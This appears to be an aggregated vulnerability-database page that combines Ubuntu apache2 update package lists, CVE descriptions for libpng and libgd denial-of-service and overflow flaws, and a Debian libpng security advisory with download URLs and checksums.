    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.4_sparc.deb
      Size/MD5:   211028 28b74d86e10301276cadef208b460658
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.4_sparc.deb
      Size/MD5:   206566 6d6b2e1e3e0bbf8fc0a0bcca60a33339
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.4_sparc.deb
      Size/MD5:   210280 45690384f2e7e0a2168d7867283f9145
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.4_sparc.deb
      Size/MD5:   171732 6595a330344087593a9443b9cdf5e4ba
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.4_sparc.deb
      Size/MD5:   172498 f1ac3a442b21db9d2733e8221b218e25
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.4_sparc.deb
      Size/MD5:    93606 f229d1c258363d2d0dfb3688ec96638e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.4_sparc.deb
      Size/MD5:    36616 6f470e2e17dfc6d587fbe2bf861bfb06
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.4_sparc.deb
      Size/MD5:   268178 5a853d01127853405a677c53dc2bf254
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.4_sparc.deb
      Size/MD5:   130456 a0a51bb9405224948b88903779347427
Updated packages for Ubuntu 7.10:
  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.4-3ubuntu0.2.diff.gz
      Size/MD5:   125080 c5c1b91f6918d42a75d23e95799b3707
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.4-3ubuntu0.2.dsc
      Size/MD5:     1333 b028e602b998a666681d1aa73b980c06
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.4.orig.tar.gz
      Size/MD5:  6365535 3add41e0b924d4bb53c2dee55a38c09e
  Architecture independent packages:
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.2.4-3ubuntu0.2_all.deb
      Size/MD5:  2211750 9dc3a7e0431fe603bbd82bf647d2d1f5
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.2.4-3ubuntu0.2_all.deb
      Size/MD5:   278670 985dd1538d0d2c6bb74c458eaada1cb7
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-src_2.2.4-3ubuntu0.2_all.deb
      Size/MD5:  6702036 3cdb5e1a9d22d7172adfd066dd42d71a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.4-3ubuntu0.2_all.deb
      Size/MD5:    42846 ba7b0cbf7f33ac3b6321c132bc2fec71
  amd64 architecture (Athlon64, Opteron, EM64T Xeon):
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.4-3ubuntu0.2_amd64.deb
      Size/MD5:   457286 b37825dc4bb0215284181aa5dfc9dd44
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.4-3ubuntu0.2_amd64.deb
      Size/MD5:   453094 380ea917048a64c2c9bc12d768ac2ffa
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.4-3ubuntu0.2_amd64.deb
      Size/MD5:   456804 b075ef4e563a55c7977af4d82d90e493
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.4-3ubuntu0.2_amd64.deb
      Size/MD5:   410658 6dff5030f33af340b2100e8591598d9d
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.4-3ubuntu0.2_amd64.deb
      Size/MD5:   411244 9c79a2c0a2d4d8a88fae1b3f10d0e27c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.4-3ubuntu0.2_amd64.deb
      Size/MD5:   348256 ef1e159b64fe2524dc94b6ab9e22cefb
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.4-3ubuntu0.2_amd64.deb
      Size/MD5:   992256 0e9bac368bc57637079f839bcce8ebbc
  i386 architecture (x86 compatible Intel/AMD):
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.4-3ubuntu0.2_i386.deb
      Size/MD5:   440388 bdb2ced3ca782cda345fcfb109e8b02a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.4-3ubuntu0.2_i386.deb
      Size/MD5:   436030 44d372ff590a6e42a83bcd1fb5e546fe
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.4-3ubuntu0.2_i386.deb
      Size/MD5:   439732 5119be595fb6ac6f9dd94d01353da257
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.4-3ubuntu0.2_i386.deb
      Size/MD5:   410656 01be0eca15fe252bbcab7562462af5ca
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.4-3ubuntu0.2_i386.deb
      Size/MD5:   411250 10d8929e9d37050488f2906fde13b2fd
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.4-3ubuntu0.2_i386.deb
      Size/MD5:   347322 d229c56720ae5f1f83645f66e1bfbdf1
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.4-3ubuntu0.2_i386.deb
      Size/MD5:   947460 3dc120127b16134b42e0124a1fdfa4ab
  lpia architecture (Low Power Intel Architecture):
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.4-3ubuntu0.2_lpia.deb
      Size/MD5:   439896 8e856643ebeed84ffbeb6150f6e917c5
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.4-3ubuntu0.2_lpia.deb
      Size/MD5:   435524 ce18d9e09185526c93c6af6db7a6b5cf
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.4-3ubuntu0.2_lpia.deb
      Size/MD5:   439180 9622bf2dfee7941533faedd2e2d4ebbd
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.4-3ubuntu0.2_lpia.deb
      Size/MD5:   410674 684ad4367bc9250468351b5807dee424
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.4-3ubuntu0.2_lpia.deb
      Size/MD5:   411258 17f53e8d3898607ce155dc333237690c
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.4-3ubuntu0.2_lpia.deb
      Size/MD5:   347664 1197aa4145372ae6db497fb157cb0da1
    http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.4-3ubuntu0.2_lpia.deb
      Size/MD5:   939924 470a7163e2834781b2db0689750ce0f2
  powerpc architecture (Apple Macintosh G3/G4/G5):
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.4-3ubuntu0.2_powerpc.deb
      Size/MD5:   458848 4efbbcc96f05a03301a13448f9cb3c01
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.4-3ubuntu0.2_powerpc.deb
      Size/MD5:   454226 1fe4c7712fd4597ed37730a27df95113
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.4-3ubuntu0.2_powerpc.deb
      Size/MD5:   458134 5786d901931cecd340cc1879e27bcef7
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.4-3ubuntu0.2_powerpc.deb
      Size/MD5:   410676 9fc94d5b21a8b0f7f8aab9dc60339abf
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.4-3ubuntu0.2_powerpc.deb
      Size/MD5:   411266 c44cde12a002910f9df02c10cdd26b0c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.4-3ubuntu0.2_powerpc.deb
      Size/MD5:   367392 612ddcebee145f765163a0b30124393a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.4-3ubuntu0.2_powerpc.deb
      Size/MD5:  1094288 72fd7d87f4876648d1e14a5022c61b00
  sparc architecture (Sun SPARC/UltraSPARC):
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.4-3ubuntu0.2_sparc.deb
      Size/MD5:   441650 28e5a2c2d18239c0810b6de3584af221
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.4-3ubuntu0.2_sparc.deb
      Size/MD5:   437796 3ee7408c58fbdf8de6bf681970c1c9ad
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.4-3ubuntu0.2_sparc.deb
      Size/MD5:   441114 b1b1bb871fe0385ea4418d533f0669aa
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.4-3ubuntu0.2_sparc.deb
      Size/MD5:   410676 cf7bed097f63e3c24337813621866498
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.4-3ubuntu0.2_sparc.deb
      Size/MD5:   411252 5a30177f7039f52783576e126cf042d0
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.4-3ubuntu0.2_sparc.deb
      Size/MD5:   350468 ce216a4e9739966cd2aca4262ba0ea4e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.4-3ubuntu0.2_sparc.deb
      Size/MD5:   959090 98ad8ee7328f25e1e81e110bbfce10c2
Updated packages for Ubuntu 8.04 LTS:
  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.8-1ubuntu0.4.diff.gz
      Size/MD5:   132376 1a3c4e93f08a23c3a3323cb02f5963b6
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.8-1ubuntu0.4.dsc
      Size/MD5:     1379 ed1a1e5de71b0e35100f60b21f959db4
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.8.orig.tar.gz
      Size/MD5:  6125771 39a755eb0f584c279336387b321e3dfc
  Architecture independent packages:
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.2.8-1ubuntu0.4_all.deb
      Size/MD5:  1928164 86b52d997fe3e4baf9712be0562eed2d
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.2.8-1ubuntu0.4_all.deb
      Size/MD5:    72176 1f4efe37abf317c3c42c4c0a79a4f232
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-src_2.2.8-1ubuntu0.4_all.deb
      Size/MD5:  6254152 fe271b0e4aa0cf80e99b866c23707b6a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.8-1ubuntu0.4_all.deb
      Size/MD5:    45090 3f44651df13cfd495d7c33dda1c709ea
  amd64 architecture (Athlon64, Opteron, EM64T Xeon):
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.8-1ubuntu0.4_amd64.deb
      Size/MD5:   252272 3d27b0311303e7c5912538fb7d4fc37c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.8-1ubuntu0.4_amd64.deb
      Size/MD5:   247850 1ce7ff6190c21da119d98b7568f2e5d0
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.8-1ubuntu0.4_amd64.deb
      Size/MD5:   251658 ac7bc78b449cf8d28d4c10478c6f1409
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.8-1ubuntu0.4_amd64.deb
      Size/MD5:   204658 66e95c370f2662082f3ec41e4a033877
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.8-1ubuntu0.4_amd64.deb
      Size/MD5:   205336 6b1e7e0ab97b7dd4470c153275f1109c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.8-1ubuntu0.4_amd64.deb
      Size/MD5:   140940 cad14e08ab48ca8eb06480c0db686779
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.8-1ubuntu0.4_amd64.deb
      Size/MD5:   801764 3759103e3417d44bea8866399ba34a66
  i386 architecture (x86 compatible Intel/AMD):
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.8-1ubuntu0.4_i386.deb
      Size/MD5:   235194 dddbc62f458d9f1935087a072e1c6f67
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.8-1ubuntu0.4_i386.deb
      Size/MD5:   230748 db0a1dc277de5886655ad7b1cc5b0f1a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.8-1ubuntu0.4_i386.deb
      Size/MD5:   234542 0e4997e9ed55d6086c439948cf1347ff
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.8-1ubuntu0.4_i386.deb
      Size/MD5:   204672 1f58383838b3b9f066e855af9f4e47e0
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.8-1ubuntu0.4_i386.deb
      Size/MD5:   205348 fa032fc136c5b26ccf364289a93a1cda
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.8-1ubuntu0.4_i386.deb
      Size/MD5:   139904 b503316d420ccb7efae5082368b95e01
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.8-1ubuntu0.4_i386.deb
      Size/MD5:   754788 140fddccc1a6d3dc743d37ab422438c2
  lpia architecture (Low Power Intel Architecture):
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.8-1ubuntu0.4_lpia.deb
      Size/MD5:   234752 bc06d67259257109fe8fc17204bc9950
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.8-1ubuntu0.4_lpia.deb
      Size/MD5:   230424 9421376c8f6d64e5c87af4f484b8aacf
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.8-1ubuntu0.4_lpia.deb
      Size/MD5:   233908 179236460d7b7b71dff5e1d1ac9f0509
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.8-1ubuntu0.4_lpia.deb
      Size/MD5:   204664 764d773d28d032767d697eec6c6fd50a
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.8-1ubuntu0.4_lpia.deb
      Size/MD5:   205342 2891770939b51b1ca6b8ac8ca9142db1
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.8-1ubuntu0.4_lpia.deb
      Size/MD5:   140478 4a062088427f1d8b731e06d64eb7e2ea
    http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.8-1ubuntu0.4_lpia.deb
      Size/MD5:   748672 b66dbda7126616894cf97eb93a959af9
  powerpc architecture (Apple Macintosh G3/G4/G5):
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.8-1ubuntu0.4_powerpc.deb
      Size/MD5:   253368 bad43203ed4615216bf28f6da7feb81b
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.8-1ubuntu0.4_powerpc.deb
      Size/MD5:   248800 aa757fd46cd79543a020dcd3c6aa1b26
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.8-1ubuntu0.4_powerpc.deb
      Size/MD5:   252904 682a940b7f3d14333037c80f7f01c793
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.8-1ubuntu0.4_powerpc.deb
      Size/MD5:   204678 30af6c826869b647bc60ed2d99cc30f7
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.8-1ubuntu0.4_powerpc.deb
      Size/MD5:   205376 cd02ca263703a6049a6fe7e11f72c98a
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.8-1ubuntu0.4_powerpc.deb
      Size/MD5:   157662 df6cdceecb8ae9d25bbd614142da0151
    http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.8-1ubuntu0.4_powerpc.deb
      Size/MD5:   904904 34581d1b3c448a5de72a06393557dd48
  sparc architecture (Sun SPARC/UltraSPARC):
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-event_2.2.8-1ubuntu0.4_sparc.deb
      Size/MD5:   236418 2eda543f97646f966f5678e2f2a0ba90
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-prefork_2.2.8-1ubuntu0.4_sparc.deb
      Size/MD5:   232386 69e2419f27867b77d94a652a83478ad7
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-mpm-worker_2.2.8-1ubuntu0.4_sparc.deb
      Size/MD5:   235788 414a49286d9e8dd7b343bd9207dc727b
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-prefork-dev_2.2.8-1ubuntu0.4_sparc.deb
      Size/MD5:   204668 f7d099cd9d3ebc0baccbdd896c94a88f
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-threaded-dev_2.2.8-1ubuntu0.4_sparc.deb
      Size/MD5:   205352 0a5cb5dfd823b4e6708a9bcc633a90cd
    http://ports.ubuntu.com/pool/main/a/apache2/apache2-utils_2.2.8-1ubuntu0.4_sparc.deb
      Size/MD5:   143108 ad78ead4ac992aec97983704b1a3877f
    http://ports.ubuntu.com/pool/main/a/apache2/apache2.2-common_2.2.8-1ubuntu0.4_sparc.deb
      Size/MD5:   763946 0d40a8ebecfef8c1a099f2170fcddb73
. 
References: CVE-2006-3918, CVE-2007-4465, CVE-2007-6203, CVE-2008-0005, CVE-2008-0599, CVE-2008-2168, CVE-2008-2364, CVE-2008-2371, CVE-2008-2665, CVE-2008-2666, CVE-2008-2829, CVE-2008-2939, CVE-2008-3658, CVE-2008-3659, CVE-2008-3660, CVE-2008-5498, CVE-2008-5557, CVE-2008-5624, CVE-2008-5625, CVE-2008-5658
                        
| VAR-200705-0670 | CVE-2007-2445 | Libpng Library Remote Denial of Service Vulnerability | CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM | 
                            The png_handle_tRNS function in pngrutil.c in libpng before 1.0.25 and 1.2.x before 1.2.17 allows remote attackers to cause a denial of service (application crash) via a grayscale PNG image with a bad tRNS chunk CRC value. The libpng library contains a denial-of-service vulnerability. libpng There is a service disruption (DoS) Vulnerabilities exist PNG (Portable Network Graphics) Format image processing library libpng of png_handle_tRNS() Functions include CRC Incorrect processing after check PNG Denial of service when processing files (DoS) There is a vulnerability that becomes a condition.Web Pre-crafted, installed on site or attached to email png By browsing the file, service operation interruption (DoS) It may be in a state. 
Successful exploits may allow remote attackers to cause denial-of-service conditions on computers running the affected library. 
This issue affects libpng-0.90 through libpng-1.2.16. 
This BID is being retired because this issue was addressed in BID 24000 (Libpng Library Remote Denial of Service Vulnerability). 
CVE-2007-3476
    An array indexing error in libgd's GIF handling could induce a
    denial of service (crash with heap corruption) if exceptionally
    large color index values are supplied in a maliciously crafted
    GIF image file. 
CVE-2007-3477
    The imagearc() and imagefilledarc() routines in libgd allow
    an attacker in control of the parameters used to specify
    the degrees of arc for those drawing functions to perform
    a denial of service attack (excessive CPU consumption). 
CVE-2007-3996
    Multiple integer overflows exist in libgd's image resizing and
    creation routines; these weaknesses allow an attacker in control
    of the parameters passed to those routines to induce a crash or
    execute arbitrary code with the privileges of the user running
    an application or interpreter linked against libgd2. 
Debian GNU/Linux 4.0 alias etch
- -------------------------------
Debian (stable)
- ---------------
Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
Debian Security Advisory DSA-1750-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
March 22, 2009                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package        : libpng
Vulnerability  : several
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2007-2445 CVE-2007-5269 CVE-2008-1382 CVE-2008-5907 CVE-2008-6218 CVE-2009-0040
Debian Bug     : 446308 476669 516256 512665
Several vulnerabilities have been discovered in libpng, a library for
reading and writing PNG files. (CVE-2008-1382)
The png_check_keyword might allow context-dependent attackers to set the
value of an arbitrary memory location to zero via vectors involving
creation of crafted PNG files with keywords. (CVE-2009-0040)
For the old stable distribution (etch), these problems have been fixed
in version1.2.15~beta5-1+etch2. 
For the stable distribution (lenny), these problems have been fixed in
version 1.2.27-2+lenny2.  (Only CVE-2008-5907, CVE-2008-5907 and
CVE-2009-0040 affect the stable distribution.)
For the unstable distribution (sid), these problems have been fixed in
version 1.2.35-1. 
We recommend that you upgrade your libpng packages. 
Upgrade instructions
- --------------------
wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file. 
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration. 
Debian GNU/Linux 4.0 alias etch
- -------------------------------
Source archives:
  http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz
    Size/MD5 checksum:   829038 77ca14fcee1f1f4daaaa28123bd0b22d
  http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.diff.gz
    Size/MD5 checksum:    18622 e1e1b7d74b9af5861bdcfc50154d2b4c
  http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.dsc
    Size/MD5 checksum:     1033 a0668aeec893b093e1f8f68316a04041
Architecture independent packages:
  http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.15~beta5-1+etch2_all.deb
    Size/MD5 checksum:      882 eb0e501247bd91837c090cf3353e07c6
alpha architecture (DEC Alpha)
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_alpha.deb
    Size/MD5 checksum:   214038 1dd9a6d646d8ae533fbabbb32e03149a
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_alpha.deb
    Size/MD5 checksum:   204478 d04c5a2151ca4aa8b1fa6f1b3078e418
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_alpha.udeb
    Size/MD5 checksum:    85270 1fcfca5bfd47a2f6611074832273ac0b
amd64 architecture (AMD x86_64 (AMD64))
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_amd64.deb
    Size/MD5 checksum:   188124 703758e444f77281b9104e20c358b521
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_amd64.deb
    Size/MD5 checksum:   179186 d2596f942999be2acb79e77d12d99c2e
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_amd64.udeb
    Size/MD5 checksum:    69056 4bd8858ff3ef96c108d2f357e67c7b73
arm architecture (ARM)
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_arm.udeb
    Size/MD5 checksum:    63714 14bd7b3fa29b01ebc18b6611eea486d1
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_arm.deb
    Size/MD5 checksum:   168764 54a349016bbdd6624fe8552bd951fee0
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_arm.deb
    Size/MD5 checksum:   182720 79e501f9c79d31b0f9c8b5a4f16f6a2e
hppa architecture (HP PA RISC)
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_hppa.udeb
    Size/MD5 checksum:    74440 e240adb3f2b0f8ed35a3c2fe2dd35da1
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_hppa.deb
    Size/MD5 checksum:   187052 e5f7162d516fc3d8e953726d7fb5b6ae
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_hppa.deb
    Size/MD5 checksum:   194360 83928ed4057deade50551874a6a85d27
i386 architecture (Intel ia32)
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_i386.udeb
    Size/MD5 checksum:    67656 66d9d533e26e4f74fbdd01bf55fa40b1
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_i386.deb
    Size/MD5 checksum:   187710 20da5a533679aee19edf5cd0c339f2c9
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_i386.deb
    Size/MD5 checksum:   170784 b19d4f0f8be4d65dbb847079ce2effa8
ia64 architecture (Intel ia64)
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_ia64.deb
    Size/MD5 checksum:   227792 eb01ade8e4b4dba3215832b8c632548a
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_ia64.udeb
    Size/MD5 checksum:   108076 cb3ae7c7c66dcafce969608a437fdade
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_ia64.deb
    Size/MD5 checksum:   227388 83fa9e2ba1a370fe1b973688ab6096dd
mips architecture (MIPS (Big Endian))
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mips.deb
    Size/MD5 checksum:   187814 daa3c7c3aeae294c661324528e0f6c3e
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mips.deb
    Size/MD5 checksum:   187016 e556557c1c570c66656232422af38c8e
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mips.udeb
    Size/MD5 checksum:    67730 ae7ea1cd95eacae754ba35e9fae19818
mipsel architecture (MIPS (Little Endian))
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mipsel.udeb
    Size/MD5 checksum:    67996 4be0aa40152ac55a7355aea2204d7888
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mipsel.deb
    Size/MD5 checksum:   187852 19a6eddae81d4f9d768f8c0ef442b0ed
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mipsel.deb
    Size/MD5 checksum:   187282 119ae6083edd419fed3fe970cc507919
powerpc architecture (PowerPC)
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_powerpc.deb
    Size/MD5 checksum:   178452 e48dc544abc3df3ec474930639e29469
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_powerpc.deb
    Size/MD5 checksum:   186636 b8319bb815dec618288cdd35cd37c191
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_powerpc.udeb
    Size/MD5 checksum:    67430 a3717e7c30011e60be99ce04983f2984
s390 architecture (IBM S/390)
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_s390.deb
    Size/MD5 checksum:   178548 790f01dc85511343a4ef9b4832f3b1fa
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_s390.deb
    Size/MD5 checksum:   190648 a79ea20f0b8af58765d2b14ec276aa5a
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_s390.udeb
    Size/MD5 checksum:    71438 aa83c3a2ab4da51670da3eafcedddac9
sparc architecture (Sun SPARC/UltraSPARC)
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_sparc.udeb
    Size/MD5 checksum:    64914 13bcdda845e00493e1b25413452302d0
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_sparc.deb
    Size/MD5 checksum:   184734 0f0e7865607948f07a604c86fd4f94bb
  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_sparc.deb
    Size/MD5 checksum:   172558 2853d84c9f9823d0bfe77b1fca00348d
Debian GNU/Linux 5.0 alias lenny
- --------------------------------
Source archives:
  http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.diff.gz
    Size/MD5 checksum:    16783 64d84ee2a3098905d361711dc96698c9
  http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz
    Size/MD5 checksum:   783204 13a0de401db1972a8e68f47d5bdadd13
  http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.dsc
    Size/MD5 checksum:     1492 8c82810267b23916b6207fa40f0b6bce
Architecture independent packages:
  http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny2_all.deb
    Size/MD5 checksum:      878 8d46f725bd49014cdb4e15508baea203
alpha architecture (DEC Alpha)
